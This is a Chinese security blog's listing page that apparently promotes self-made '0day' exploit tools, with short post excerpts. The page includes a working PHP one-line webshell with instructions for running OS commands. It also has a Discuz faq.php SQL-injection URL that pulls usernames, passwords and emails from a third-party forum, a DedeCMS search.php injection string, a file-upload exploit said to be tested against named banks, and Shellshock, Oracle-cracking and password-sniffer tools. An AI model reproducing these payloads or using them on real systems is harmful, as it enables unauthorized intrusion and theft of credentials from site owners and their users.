预览模式: 普通 | 列表

*******************************************************************
#工具标题: 『河马』信雅达 在线客服系统 uploadFile.jsp 文件上传漏洞-jsp木马版(0day)
#开发日期: 2015-10-16
#作者: 赵显阳
#测试: 杭州银行,中国银行

查看更多...

Tags: 0day

分类:0day利用工具 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 2263

河马web密码嗅探器v1.1




风行是一款集在线点播和下载影视(电影、电视)节目的视频播放软件,具有风行网首创的“边下边看”特点。
最新版的风行电影2.6,以新颖的交互界面,超凡的下载速度,以及海量的影视节目,让您畅快淋漓地享受高品质的影视服务。风行网上看电影,确保全程流畅,
以上是对风行软件的简单介绍,下面就看看风行软件的安全问题,打开程序目录,

查看更多...

Tags: 研究文档

分类:研究文档 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 2726

isafe.cc" target="_blank">isafe.cc-欢迎使用
  感谢您使用 『便携式文件夹加密器』

  河马软件致力于为您提供更安全、更高效、更便捷的加密软件。

查看更多...

Tags: 加密

分类:密码哈希解密 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 2427

Oracle数据库渗透技术浅析

  
                      
文/图赵显阳(isafe.cc" target="_blank">isafe.cc" target="_blank">http://www.isafe.cc" target="_blank">isafe.cc)
oracle数据库简介
oracle是一个数据库系统,和 MS SQL Server 数据库类似,支持SQL语言的同时还支持ada编程、Java代码编程等,可以运行在Windows,Linux等操作系统上,今天来对如何渗透Oracle数据库系统进行研究,Oracle的漏洞有很多,如默认DBSNMP账号密码,低版本的SID枚举,本地权限提升,一些函数存在SQL注入,缓冲区溢出等等。下面我们先来破解Oracle的登录账号,然后使用Delphi编程在数据库服务器上执行任意命令。
oracle数据库账号破解

查看更多...

分类:oracle密码破解 | 固定链接 | 评论: 3 | 引用: 0 | 查看次数: 16148

『河马』HTTP Request Editor




『河马』HTTP Request Editor
用于分析HTTP数据包,可构GET POST COOKIE请求

查看更多...

Tags: websmart

分类:WebSmart | 固定链接 | 评论: 2760 | 引用: 0 | 查看次数: 69410

文件/user/storage_explort.php
<?php
/**
* 用户网络存储列表
*

查看更多...

Tags: 0day

分类:0day利用工具 | 固定链接 | 评论: 167 | 引用: 0 | 查看次数: 17406

dedecms的最近出的一高危漏洞,
存在漏洞的文件/plus/search.php
下面是漏洞的详细利用细节:
    
isafe.cc" target="_blank">isafe.cc/plus/search.php?keyword=as" target="_blank">http://www.isafe.cc" target="_blank">isafe.cc/plus/search.php?keyword=as&typeArr[ uNion ]=a

查看更多...

Tags: 0day

分类:0day利用工具 | 固定链接 | 评论: 13 | 引用: 0 | 查看次数: 5080

2014年9月24日Bash被公布存在远程代码执行漏洞,河马安全网第一时间根据信息研判,确认该漏洞可以产生严重的后果,且分布广泛,于北京时间9月24日早晨5时30分启动了分析代码和工具利用编写。河马安全网针对该漏洞进行了严格地分析验证,确认该漏洞会影响目前主流的Linux和Mac OSX操作系统平台,包括但不限于Redhat、CentOS、Ubuntu、Debian、Fedora、Amazon Linux、OS X 10.10等平台。该漏洞可以通过构造环境变量的值来执行想要执行的攻击代码脚本,会影响到与Bash交互的多种应用,包括HTTP、OpenSSH、DHCP等。根据目前的漏洞验证情况以及已经流传的POC情况,这个漏洞将严重影响网络基础设施的安全,包括但不限于网络设备、网络安全设备、云和大数据中心等。特别是Bash广泛地分布和存在于设备中,其消除过程将非常长尾,且易于利用其编写蠕虫进行自动化传播,同时也将导致僵尸网络的发展,目前已有多个境外安全机构发出了警告。

 

 『河马』apache mod_cgi bash 命令注入漏洞利用工具v2.0(解压密码 isafe.cc).rar

Tags: 0day

分类:0day利用工具 | 固定链接 | 评论: 3 | 引用: 0 | 查看次数: 9410

『河马』apache mod_cgi bash 命令注入漏洞



2014年9月24日Bash被公布存在远程代码执行漏洞,河马安全网第一时间根据信息研判,确认该漏洞可以
产生严重的后果,且分布广泛,于北京时间9月24日早晨5时30分启动了分析代码和工具利用编写。
河马安全网针对该漏洞进行了严格地分析验证,确认该漏洞会影响目前主流的Linux和Mac OSX操作系统平
台,包括但不限于Redhat、CentOS、Ubuntu、Debian、Fedora、Amazon Linux、OS X 10.10等平

查看更多...

Tags: 0day

分类:0day利用工具 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 2694

河马web应用防火墙



“河马web应用防火墙”网站保护系统能够为社区内的网站提供一站式的安全解决方案,使网站在“零部署”、
“零维护”的情况下,防止诸如XSS、SQL注入、木马、零日攻击、僵尸网络等各种网站安全问题。同时,“河
马web应用防火墙”综合采用跨运营商智能调度、页面优化、页面缓存等技术,进一步提升访问速度,降低故障
率,从而整体提升网站的用户体验。在将来,“河马web应用防火墙”将进一步以云计算为基础,专注于“后

查看更多...

Tags: waf

分类:Web应用防火墙 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 4425


【河马】 php一句话木马服务端和客户端v1.1
版本1功能:软件是一个php脚本木马,将<?php echo $_GET[2]($_GET[0]($_GET[1]));?>
写入文件webshell.php中,然后使用软件进行连接,就可以执行OS命令,
支持的函数有system,shell_exec,passthru

查看更多...

Tags: 远程控制

分类:远程控制 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 3661

discuz_7.2_faq.php_注入漏洞利用工具 POC
http://bbs.dianjian.net//faq.php?action=
grouppermission&gids[99]=%27&gids[100]
[0]=)%20and%20(select%201%20from%20
(select%20count(*),concat((select%20(select%20(select%20concat(username,0x23,password,0x23,email)%20f

查看更多...

Tags: 0day

分类:0day利用工具 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 3117


eyou 邮件系统存在SQL注入漏洞,利用此漏洞可以获取webshell


查看更多...

Tags: 0day

分类:0day利用工具 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 4084
无标题文档